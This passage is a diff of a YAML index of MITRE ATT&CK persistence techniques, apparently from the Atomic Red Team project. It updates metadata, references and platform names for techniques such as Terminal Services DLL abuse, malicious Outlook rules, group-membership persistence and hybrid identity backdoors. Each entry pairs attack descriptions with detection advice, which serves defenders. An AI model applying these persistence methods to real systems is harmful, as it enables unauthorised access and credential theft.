+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -29499,24 +29833,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -29608,8 +29974,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -29640,71 +30006,139 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests: []
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -29735,7 +30169,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -29790,13 +30224,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29857,9 +30289,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -29868,7 +30300,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -29921,7 +30352,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29942,12 +30373,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30031,11 +30461,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30048,7 +30477,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -30061,7 +30489,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -30091,7 +30518,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -30123,7 +30551,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30145,8 +30573,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -30172,7 +30598,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30198,36 +30624,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -30235,9 +30659,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -30246,21 +30670,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -30300,13 +30725,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30383,12 +30805,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
